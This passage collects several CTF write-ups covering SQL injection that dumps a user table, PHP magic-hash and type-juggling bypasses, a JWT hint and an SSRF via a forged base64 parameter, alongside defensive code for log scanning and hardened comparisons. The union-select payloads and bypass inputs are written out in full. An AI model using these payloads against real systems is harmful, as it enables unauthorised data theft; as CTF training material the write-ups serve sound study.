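    '192.168.32.1 - - [29/Sep/2015:03:39:46 -0400] "GET /mutillidae/index.php?page=client-side-control-challenge.php HTTP/1.1" 200 9197 "http://192.168.32.134/mutillidae/index.php?page=user-info.php&username=%27+union+all+select+1%2CString.fromCharCode%28102%2C%2B108%2C%2B97%2C%2B103%2C%2B32%2C%2B105%2C%2B115%2C%2B32%2C%2B68%2C%2B97%2C%2B114%2C%2B107%2C%2B67%2C%2B84%2C%2B70%2C%2B123%2C%2B53%2C%2B113%2C%2B108%2C%2B95%2C%2B49%2C%2B110%2C%2B106%2C%2B51%2C%2B99%2C%2B116%2C%2B49%2C%2B48%2C%2B110%2C%2B125%29%2C3+--%2B&password=&user-info-php-submit-button=View+Account+Details" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36"',
    '10.0.0.7 - - [29/Sep/2015:03:40:01 -0400] "GET /index.html HTTP/1.1" 200 512 "-" "curl/7.64.1"',
]

# Apache "combined" log format: ip ident user [time] "method target proto" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
SQLI_RE = re.compile(r"union\s+(all\s+)?select|fromcharcode\s*\(", re.I)
CHARCODE_RE = re.compile(r"fromCharCode\s*\(([^)]*)\)")

def decode_charcodes(text):
    """Turn every String.fromCharCode(102, 108, ...) in `text` back into a string."""
    decoded = []
    for match in CHARCODE_RE.finditer(text):
        codes = [int(c) for c in match.group(1).split(",") if c.strip()]
        decoded.append("".join(chr(c) for c in codes))
    return decoded

def scan(lines):
    """Flag requests whose URL-decoded target or Referer carries SQLi markers."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue   # not combined format; a real pipeline would count these
        # Decode before matching: the payload is %-encoded and uses + for spaces.
        decoded = unquote_plus(m["target"]) + " " + unquote_plus(m["referer"])
        if SQLI_RE.search(decoded):
            hits.append({"ip": m["ip"], "time": m["ts"], "status": m["status"],
                         "payloads": decode_charcodes(decoded)})
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["time"], hit["ip"], hit["status"], hit["payloads"])
```

Note that the second hit is only visible through the Referer: the request itself is for an unrelated page, so a rule that looks at the request line alone misses the injected string the attacker sent a moment earlier.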

So_Simple

The challenge statement says "Try id as parameter", so I tried giving it some values.

Adding a ' to the GET request produces a MySQL error:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''8 OR 1'' LIMIT 0,1' at line 1 

So presumably SQLi is possible.

'or+'A'='A
Your Login name:LOL
Your Password:Try
' union select 1,2,3 and 'A'='A
Your Login name:2
Your Password:1
GET /?id='+union+select+1,group_concat(table_name),3+from+information_schema.columns+where+table_schema='id14831952_security'%23 
<font size='5' color= '#05ff1a'>Your Login name:emails,emails,referers,referers,referers,uagents,uagents,uagents,uagents,users,users,users<br>Your Password:3</font>
GET /?id='+union+select+1,group_concat(column_name),3+from+information_schema.columns+where+table_schema='id14831952_security'%23 
<font size='5' color= '#05ff1a'>Your Login name:id,email_id,id,referer,ip_address,id,uagent,ip_address,username,id,username,password<br>Your Password:3</font>
GET /?id='+union+select+1,group_concat(username),group_concat(password)+from+users%23 HTTP/1.1
<font size='5' color= '#05ff1a'>Your Login name:LOL,Try,fake,its secure,not,dont read,try to think ,admin,flag<br>Your Password:Try ,another,<a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="7f0f3f0c0c08100d1b">[email&#160;protected]</a>,dont try to hack,easy,my database,new,darkCTF{this_is_not_a_flag},darkCTF{uniqu3_ide4_t0_find_fl4g}</font>

Simple_SQL

Looking at the source:

<!-- Try id as parameter  --> 

So I thought I'd have to do SQLi on id, but just passing some number produced the flag.

PHP İnformation

<?php

include "flag.php";

echo show_source("index.php");


if (!empty($_SERVER['QUERY_STRING'])) {
    $query = $_SERVER['QUERY_STRING'];
    $res = parse_str($query);
    if (!empty($res['darkctf'])){
        $darkctf = $res['darkctf'];
    }
}

if ($darkctf === "2020"){
    echo "<h1 style='color: chartreuse;'>Flag : $flag</h1></br>";
}

if ($_SERVER["HTTP_USER_AGENT"] === base64_decode("MjAyMF90aGVfYmVzdF95ZWFyX2Nvcm9uYQ==")){
    echo "<h1 style='color: chartreuse;'>Flag : $flag_1</h1></br>";
}


if (!empty($_SERVER['QUERY_STRING'])) {
    $query = $_SERVER['QUERY_STRING'];
    $res = parse_str($query);
    if (!empty($res['ctf2020'])){
        $ctf2020 = $res['ctf2020'];
    }
    if ($ctf2020 === base64_encode("ZGFya2N0Zi0yMDIwLXdlYg==")){
        echo "<h1 style='color: chartreuse;'>Flag : $flag_2</h1></br>";
                
        }
    }



    if (isset($_GET['karma']) and isset($_GET['2020'])) {
        if ($_GET['karma'] != $_GET['2020'])
        if (md5($_GET['karma']) == md5($_GET['2020']))
            echo "<h1 style='color: chartreuse;'>Flag : $flag_3</h1></br>";
        else
            echo "<h1 style='color: chartreuse;'>Wrong</h1></br>";
    }



?> 

Basically, doing what's written here reveals the flag piece by piece.

?darkctf=2020

$ echo -n 'MjAyMF90aGVfYmVzdF95ZWFyX2Nvcm9uYQ==' | base64 -d
2020_the_best_year_corona
GET / HTTP/1.1
Host: php.darkarmy.xyz:7001
User-Agent: 2020_the_best_year_corona
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: ja,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: __cfduid=d67ed7d4832df7f3c8a7d6822a0e738461601037610
Upgrade-Insecure-Requests: 1
1<h1 style='color: chartreuse;'>Flag : very_</h1>
$ echo -n 'ZGFya2N0Zi0yMDIwLXdlYg==' | base64
WkdGeWEyTjBaaTB5TURJd0xYZGxZZz09

For the md5 collision I referred to the PHP manual page for md5 (PHP: md5 - Manual):

md5('240610708') == md5('QNKCDZO')

This comparison is true because both md5() hashes start '0e' so PHP type juggling understands these strings to be scientific notation.  By definition, zero raised to any power is zero.
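
The two DarkCTF checks above (the Source challenge's is_numeric/strlen gate that 1e6 slips through, and this md5 `==` comparison) are the same PHP behaviour: a string that looks numeric is compared as a number. The following added example (my code, not the challenge's) models that rule in Python so the effect can be checked offline, and puts the hardened comparison beside it. The numeric-string regex is a simplification of PHP's grammar, and the two magic inputs are the ones quoted from the manual above.

```python
import hashlib
import hmac
import re

# Simplified model of a PHP "numeric string": optional sign, digits with an
# optional fraction, optional exponent (PHP also tolerates surrounding spaces).
_NUMERIC = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?\s*$")

def php_is_numeric(s):
    return _NUMERIC.match(s) is not None

def php_loose_equal(a, b):
    """PHP 7's `==` on two strings: if both are numeric they compare as numbers."""
    if php_is_numeric(a) and php_is_numeric(b):
        return float(a) == float(b)
    return a == b

def source_check(user_agent):
    """The DarkCTF 'Source' gate: is_numeric, strlen < 4, and numerically > 10000."""
    return php_is_numeric(user_agent) and len(user_agent) < 4 and float(user_agent) > 10000

def md5_hex(s):
    return hashlib.md5(s.encode()).hexdigest()

def karma_check_loose(karma, year):
    """The challenge's flag_3 condition: different inputs whose md5 hex digests are `==`-equal.
    Digests of the form 0e<digits> are numeric strings equal to 0.0, so they all match."""
    return karma != year and php_loose_equal(md5_hex(karma), md5_hex(year))

def karma_check_strict(karma, year):
    """Hardened form (PHP: `===` or hash_equals): byte-exact, constant-time comparison."""
    return karma != year and hmac.compare_digest(md5_hex(karma), md5_hex(year))

if __name__ == "__main__":
    print(source_check("1e6"))                             # True: 3 chars, numerically 1000000
    print(md5_hex("240610708"), md5_hex("QNKCDZO"))        # both start with 0e
    print(karma_check_loose("240610708", "QNKCDZO"))       # True
    print(karma_check_strict("240610708", "QNKCDZO"))      # False
```

The general rule for PHP code review: any `==` or `!=` involving a hash, token or other secret-derived string is a finding; hash_equals() (or `===` where timing is irrelevant) is the fix, and for the Source-style gate, validating with ctype_digit() or filter_var(..., FILTER_VALIDATE_INT) instead of is_numeric() keeps exponent notation out.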

DarkCTF{very_nice_web_challenge_dark_ctf}

Linux

linux starter

wolfie@9ad161dbc9ce:~$ ls
bin  imp
wolfie@9ad161dbc9ce:~$ ls *
bin:
cat

imp:
flag.txt
wolfie@9ad161dbc9ce:~$ cd imp
wolfie@9ad161dbc9ce:~/imp$ cat flag.txt
darkCTF{h0pe_y0u_used_intended_w4y}

Forensics

Wolfie's Contact

$ strings wolfie_evidence.E01 | grep "dark"

f!exchange.theme-dark_scale_311eaa1fbf83a7cbX
f!exchange.theme-dark_scale_311eaa1fbf88a906x
f!generic.theme-dark_scale-_ebc0582ed803d03c.
f!generic.theme-dark_scale-_ebba56b4d823d81ch
f!generic.theme-dark_scale-_ebb655b8d830db4fl
f!generic.theme-dark_scale-_eb9c4f52d854e42bl
f!generic.theme-dark_scale-_eb924cdcd881ef3el
f!generic.theme-dark_scale-_eb6e4400d8d3032dn
f!generic.theme-dark_scale-_eb4a3b24d924171cl
f!darkblue_grad.jpg_34fdea014c6a84e41
  - Add different color schemes for dark and light backgrounds
                #dark background
<c:Notes>darkCTF{</c:Notes><c:CreationDate>2020-09-20T18:18:41Z</c:CreationDate><c:Extended xsi:nil="true"/>
$ strings wolfie_evidence.E01 | grep -A 5 "<c:Notes>"
<c:Notes>All HAil Wolfiee!!!</c:Notes><c:CreationDate>2020-09-20T18:17:25Z</c:CreationDate><c:Extended xsi:nil="true"/>
<c:ContactIDCollection><c:ContactID c:ElementID="2c340172-c995-4931-9d72-58cb72e2cf94"><c:Value>aef8d632-7ff3-4991-b307-96a2c0542156</c:Value></c:ContactID></c:ContactIDCollection><c:EmailAddressCollection><c:EmailAddress c:ElementID="a1ab3325-0eb0-4d6b-91f4-76c0e3c29165"><c:Type>SMTP</c:Type><c:Address>allhail@wolfie.wolfcom</c:Address><c:LabelCollection><c:Label>Preferred</c:Label></c:LabelCollection></c:EmailAddress><c:EmailAddress c:ElementID="1cc98125-ad32-42b1-bb1b-e8937241baec" xsi:nil="true"/></c:EmailAddressCollection><c:NameCollection><c:Name c:ElementID="64961b9d-aa18-4569-a67a-b29bc8910d0b"><c:Title>Owner</c:Title><c:FormattedName>wolfie</c:FormattedName><c:GivenName>wolfie</c:GivenName></c:Name></c:NameCollection><c:PhysicalAddressCollection><c:PhysicalAddress c:ElementID="fca464b8-801b-4072-a457-85b2d755d2a4"><c:Country>Wolfie's World</c:Country><c:Locality>Wolf Gang</c:Locality><c:Street>Wolf Street</c:Street><c:LabelCollection><c:Label>Personal</c:Label></c:LabelCollection></c:PhysicalAddress></c:PhysicalAddressCollection><c:PhotoCollection><c:Photo c:ElementID="cd19d754-8634-438d-adc2-39add8e4f486"><c:LabelCollection><c:Label>UserTile</c:Label></c:LabelCollection></c:Photo></c:PhotoCollection></c:contact>
<?xml version="1.0" encoding="UTF-8"?>
<c:contact c:Version="1" xmlns:c="http://schemas.microsoft.com/Contact" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:MSP2P="http://schemas.microsoft.com/Contact/Extended/MSP2P">
<c:Notes>darkCTF{</c:Notes><c:CreationDate>2020-09-20T18:18:41Z</c:CreationDate><c:Extended xsi:nil="true"/>
<c:ContactIDCollection><c:ContactID c:ElementID="39dc2dd6-932a-4e42-8054-6bd4ee416ef7"><c:Value>179051fe-a6a8-482f-82d2-fa01da089eb1</c:Value></c:ContactID></c:ContactIDCollection><c:EmailAddressCollection><c:EmailAddress c:ElementID="cfec7706-cc34-45c6-b23c-dafa90875aab"><c:Type>SMTP</c:Type><c:Address>dealer@deal.com</c:Address><c:LabelCollection><c:Label>Preferred</c:Label></c:LabelCollection></c:EmailAddress><c:EmailAddress c:ElementID="f56e2a64-dc23-46c6-80c7-31f611b7d826" xsi:nil="true"/></c:EmailAddressCollection><c:NameCollection><c:Name c:ElementID="82475264-1dd1-441e-9677-982340b03760"><c:NickName>dealer</c:NickName><c:FormattedName>dealer</c:FormattedName><c:GivenName>dealer</c:GivenName></c:Name></c:NameCollection><c:PhotoCollection><c:Photo c:ElementID="6161866f-3474-4f24-90f0-4ceb0cdf8634"><c:LabelCollection><c:Label>UserTile</c:Label></c:LabelCollection></c:Photo></c:PhotoCollection></c:contact>
<?xml version="1.0" encoding="UTF-8"?>
<c:contact c:Version="1" xmlns:c="http://schemas.microsoft.com/Contact" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:MSP2P="http://schemas.microsoft.com/Contact/Extended/MSP2P">
<c:Notes c:Version="1" c:ModificationDate="2020-09-20T18:19:52Z">C0ntacts_
</c:Notes><c:CreationDate>2020-09-20T18:19:12Z</c:CreationDate><c:Extended xsi:nil="true"/>
--
<c:Notes>4re_
</c:Notes><c:CreationDate>2020-09-20T18:19:55Z</c:CreationDate><c:Extended xsi:nil="true"/>
<c:ContactIDCollection><c:ContactID c:ElementID="02ee3bab-2304-4bde-a376-0f40f80c0051"><c:Value>86f01396-7858-4557-af4b-e2b72a8e6c04</c:Value></c:ContactID></c:ContactIDCollection><c:EmailAddressCollection><c:EmailAddress c:ElementID="426bea23-5a44-44be-ae68-01e63426ceba"><c:Type>SMTP</c:Type><c:Address>become@target.com</c:Address><c:LabelCollection><c:Label>Preferred</c:Label></c:LabelCollection></c:EmailAddress><c:EmailAddress c:ElementID="38fea789-296a-4f28-83bd-604fc31393de" xsi:nil="true"/></c:EmailAddressCollection><c:NameCollection><c:Name c:ElementID="02b5a5f6-0808-48e8-b00a-30742e6bd9d4"><c:FormattedName>target</c:FormattedName><c:GivenName>target</c:GivenName></c:Name></c:NameCollection><c:PhotoCollection><c:Photo c:ElementID="459674de-9a96-43c5-8756-568b77c24e7d"><c:LabelCollection><c:Label>UserTile</c:Label></c:LabelCollection></c:Photo></c:PhotoCollection></c:contact>
<?xml version="1.0" encoding="UTF-8"?>
<c:contact c:Version="1" xmlns:c="http://schemas.microsoft.com/Contact" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:MSP2P="http://schemas.microsoft.com/Contact/Extended/MSP2P">
<c:Notes>1mp0rtant}</c:Notes><c:CreationDate>2020-09-20T18:21:20Z</c:CreationDate><c:Extended xsi:nil="true"/>
<c:ContactIDCollection><c:ContactID c:ElementID="5463de33-f055-4ac1-bd71-3f01dba6aa73"><c:Value>9a1aefae-e90c-4f6e-b0a9-a9dd8d3c4e6e</c:Value></c:ContactID></c:ContactIDCollection><c:EmailAddressCollection><c:EmailAddress c:ElementID="8b067d8e-213f-4378-8217-3d8236263eed"><c:Type>SMTP</c:Type><c:Address>give@money.com</c:Address><c:LabelCollection><c:Label>Preferred</c:Label></c:LabelCollection></c:EmailAddress><c:EmailAddress c:ElementID="c4b57a23-9bb1-40d5-9313-a744a90b9699" xsi:nil="true"/></c:EmailAddressCollection><c:NameCollection><c:Name c:ElementID="1e01cb11-0111-40c5-8fbc-b56b95b8104d"><c:FormattedName>Money Giver</c:FormattedName><c:GivenName>Money Giver</c:GivenName></c:Name></c:NameCollection><c:PhotoCollection><c:Photo c:ElementID="bab69971-9f93-4764-87a6-1a8722bf4c84"><c:LabelCollection><c:Label>UserTile</c:Label></c:LabelCollection></c:Photo></c:PhotoCollection></c:contact>
regf
{qrmtmN7
OfRg
HvLE
darkCTF{C0ntacts_4re_1mp0rtant}

Rev

so_much

Looking at the given binary in Ghidra,

the get_flag function generates the flag and compares it; when they match, that is the flag.

First a function named flag_48 is called with argument 7, and after that the argument is incremented by 1 on each call, so from there I just assembled the flag by hand.

┌──(kali㉿kali)-[~]
└─$ ./so_much {w0w_s0_m4ny_funct10ns}
darkCTF{w0w_s0_m4ny_funct10ns}
WoW! so much revving...

HACON_CTF: Write up

Web

EAsy WEb

Looking at the source code:

 <!-- <script>
        function myfunc() {
            alert("1");
            let uname = document.getElementById('user').value;
            let ppass = document.getElementById('pass').value;
            //console.log("uname = ",uname, " pass = ", ppass);
            let data  ={
                username: uname,
                password: ppass
            }
            console.log("data = ",data);
            $.post("/",data)
                .done(function(result) {
                    alert(result);
                })
        }
    </script> -->

So it logs in by POSTing the username and password fields (uname and ppass).

Okay, here is a hint for you -> eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImtleW1hc3RlciIsInBhc3N3b3JkIjoic2VjcmV0a2V5In0.oJOVw-DOUGSNjGDRWe5_kZm3MAFq_Y9YZa0QyXDbvlM

is displayed.

It's a JWT, so decode it with jwt.io or similar.

Nothing depends on the signature here, so it decoded as-is.

{
  "username": "keymaster",
  "password": "secretkey"
}

Logging in with these gives

here's your next hint -> syntsvyr

as output; trying ROT13 on it gives

flagfile

so

let's look at /flagfile.

<div id="something">HACSEC{Y0u_g0T_I7}</div><div>

Misc

MISC 2

$ cat flag*
HACSEC{GoTCHA-AgAiN}
HACSEC{BetterLuck next time}
HACSEC{Youare too noob}
HACSEC{RookiesHEre--Huh!}
HACSEC{GOTCHA!}
HACON{naoo}
HACSEC{NOPESs}
Hacon{notyour flag}
HACSEC{z1ppppitnice}
HACSEC{Flag is not here}

MISC3

$ cd zipv2
$ ls
0     1     2     3     4     5     6     7     8     9
0.zip 1.zip 2.zip 3.zip 4.zip 5.zip 6.zip 7.zip 8.zip 9.zip
$ echo 1..9
1..9
$ echo ${1..9}
zsh: bad substitution
$ cat 0/*
HACSEC{Flag is not here}
$ cat 1/*
HACSEC{GOTCHA!}
$ cat 2/*
$ cat 3/*
HACSEC{GoTCHA-AgAiN}
HACSEC{BetterLuck next time}
$ cat 4/*
HACSEC{RookiesHEre--Huh!}
HACSEC{Z1ppv2}

Networking

BAsic

IPPS apparently uses port 631.

MaidakeCTF2020: Write up

Web

爆速 (Blazing Fast)

Pressing the "get flag" button redirected and came straight back, so I put a proxy in between and looked at it in Burp.

MaidakeCTF{Kirito_is_said_to_be_able_to_go_720km/h_when_he_uses_his_sword_skill}

低速 (Slow)

The value changes every time the page is reloaded.

The part that displays it is just

<p class="text-center my-5" id="flag"></p>

so let's look at the JavaScript:

function rot(str, num) {const _0x57c5=['map','join','split','call','charCodeAt','fromCharCode'];(function(_0x2715ea,_0x57c505){const _0x5c66c7=function(_0x36a3ac){while(--_0x36a3ac){_0x2715ea['push'](_0x2715ea['shift']());}};_0x5c66c7(++_0x57c505);}(_0x57c5,0x74));const _0x5c66=function(_0x2715ea,_0x57c505){_0x2715ea=_0x2715ea-0x0;let _0x5c66c7=_0x57c5[_0x2715ea];return _0x5c66c7;};const _0x2feb07=_0x5c66;let i=[];i=str[_0x2feb07('0x0')]('');return i[_0x2feb07('0x4')][_0x2feb07('0x1')](i,function(_0x36a3ac){const _0x25d8c5=_0x2feb07;x=_0x36a3ac[_0x25d8c5('0x2')](0x0);if(0x41<=x&&x<0x4e||0x61<=x&&x<0x6e)return String[_0x25d8c5('0x3')](x+num);else{if(0x4e<=x&&x<=0x5a||0x6e<=x&&x<=0x7a)return String[_0x25d8c5('0x3')](x-num);}return String[_0x25d8c5('0x3')](x);})[_0x2feb07('0x5')]('');return i;}
const _0x32f5=['forEach','floor','fromCharCode'];(function(_0x8b6703,_0x32f579){const _0x55c0f1=function(_0x213f5c){while(--_0x213f5c){_0x8b6703['push'](_0x8b6703['shift']());}};_0x55c0f1(++_0x32f579);}(_0x32f5,0x16c));const _0x55c0=function(_0x8b6703,_0x32f579){_0x8b6703=_0x8b6703-0x0;let _0x55c0f1=_0x32f5[_0x8b6703];return _0x55c0f1;};const _0x3d349f=_0x55c0,rgrigrjar=[0x4d,0x61,0x69,0x64,0x61,0x6b,0x65,0x43,0x54,0x46,0x7b,0x44,0x65,0x63,0x69,0x70,0x68,0x65,0x72,0x69,0x6e,0x67,0x5f,0x6f,0x62,0x66,0x75,0x73,0x63,0x61,0x74,0x65,0x64,0x5f,0x63,0x6f,0x64,0x65,0x5f,0x62,0x79,0x5f,0x79,0x6f,0x75,0x72,0x73,0x65,0x6c,0x66,0x5f,0x69,0x73,0x5f,0x61,0x5f,0x63,0x68,0x61,0x6c,0x6c,0x65,0x6e,0x67,0x65,0x7d];let frgtrghgdtha='';rgrigrjar[_0x3d349f('0x2')](_0x213f5c=>{const _0x305999=_0x3d349f,_0x222ace=Math[_0x305999('0x0')](Math['random']()*0xa)+0x1;frgtrghgdtha+=rot(String[_0x305999('0x1')](_0x213f5c),_0x222ace);});
$('#flag').text(frgtrghgdtha);
rgrigrjar=[0x4d,0x61,0x69,0x64,0x61,0x6b,0x65,0x43,0x54,0x46,0x7b,0x44,0x65,0x63,0x69,0x70,0x68,0x65,0x72,0x69,0x6e,0x67,0x5f,0x6f,0x62,0x66,0x75,0x73,0x63,0x61,0x74,0x65,0x64,0x5f,0x63,0x6f,0x64,0x65,0x5f,0x62,0x79,0x5f,0x79,0x6f,0x75,0x72,0x73,0x65,0x6c,0x66,0x5f,0x69,0x73,0x5f,0x61,0x5f,0x63,0x68,0x61,0x6c,0x6c,0x65,0x6e,0x67,0x65,0x7d]

This looks like the flag, which is being transformed in various ways before being displayed. All that's left is to map the ASCII codes back to characters.

MaidakeCTF{Deciphering_obfuscated_code_by_yourself_is_a_challenge}

社内用検索エンジン (Internal Search Engine)

Trying a search:

However,

https://aokakes.work/MaidakeCTF2020/shanai/?page=eyJpcCI6IjE4My4xODAuMTA1LjMwIiwidGFyZ2V0IjoidGVzdCJ9

the base64-encoded string given in the page parameter specifies an IP address and the search term, so specifying aokakes.work's IP address there should work.

$ nslookup aokakes.work
Server:     192.168.2.1
Address:    192.168.2.1#53

Non-authoritative answer:
Name:   aokakes.work
Address: 18.177.12.46
$ echo -n '{"ip":"18.177.12.46","target":"test"}' | base64
eyJpcCI6IjE4LjE3Ny4xMi40NiIsInRhcmdldCI6InRlc3QifQ==

Just pass this as the page query parameter and send the GET.
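
What makes this challenge work is that the client picks the address the server fetches from, which is server-side request forgery. The following added example (my code, not the challenge's) decodes the same page parameter and shows the check the backend was missing: only global unicast addresses on an explicit allowlist may be contacted. The allowlist is constructed, containing the address the page resolved aokakes.work to.

```python
import base64
import ipaddress
import json

# Constructed allowlist of hosts the search backend may fetch from. The page
# resolves aokakes.work to 18.177.12.46, so that is the single entry here.
ALLOWED_TARGETS = {"18.177.12.46"}

def decode_page_param(value):
    """Decode the base64 JSON carried in ?page=...; raises ValueError if malformed."""
    raw = base64.b64decode(value + "=" * (-len(value) % 4), validate=True)
    obj = json.loads(raw)
    if not isinstance(obj, dict) or not {"ip", "target"} <= set(obj):
        raise ValueError("page parameter must be a JSON object with ip and target")
    return obj

def is_allowed_fetch(ip_text, allowlist=ALLOWED_TARGETS):
    """Deny anything that is not a global unicast address on the explicit allowlist."""
    try:
        ip = ipaddress.ip_address(ip_text)
    except ValueError:
        return False            # hostnames and junk are refused outright
    if not ip.is_global:
        return False            # loopback, RFC 1918, link-local, multicast, reserved
    return str(ip) in allowlist

def plan_search(page_param):
    """Return (ip, target) the backend may contact, or None if the request is refused."""
    try:
        req = decode_page_param(page_param)
    except ValueError:          # bad base64, bad JSON or missing keys
        return None
    if not is_allowed_fetch(str(req["ip"])):
        return None
    return req["ip"], req["target"]

if __name__ == "__main__":
    # The two parameters from the write-up: the original one is refused under
    # this policy, the aokakes.work one is allowed.
    print(plan_search("eyJpcCI6IjE4My4xODAuMTA1LjMwIiwidGFyZ2V0IjoidGVzdCJ9"))      # None
    print(plan_search("eyJpcCI6IjE4LjE3Ny4xMi40NiIsInRhcmdldCI6InRlc3QifQ=="))     # ('18.177.12.46', 'test')
```

The cleaner design is to not accept an address from the client at all and keep the backend host in server configuration; where the client must choose, the choice should be an index into a server-side list rather than a free-form IP.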

Misc

SVG

$ cat flag.svg
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg
   xmlns:dc="http://purl.org/dc/elements/1.1/"
   xmlns:cc="http://creativecommons.org/ns#"
   xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
   xmlns:svg="http://www.w3.org/2000/svg"
   xmlns="http://www.w3.org/2000/svg"
   xmlns:sodipodi="http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd"
   xmlns:inkscape="http://www.inkscape.org/namespaces/inkscape"
   sodipodi:docname="flag.svg"
   inkscape:version="1.0 (4035a4fb49, 2020-05-01)"
   id="svg8"
   version="1.1"
   viewBox="0 0 1058.3334 396.875"
   height="396.875mm"
   width="1058.3334mm"
   flag="MaidakeCTF{SVG_images_are_composed_of_XML}">

焼き肉W (Yakiniku W)

I was clicking around at random and the flag appeared, so I don't really understand this one.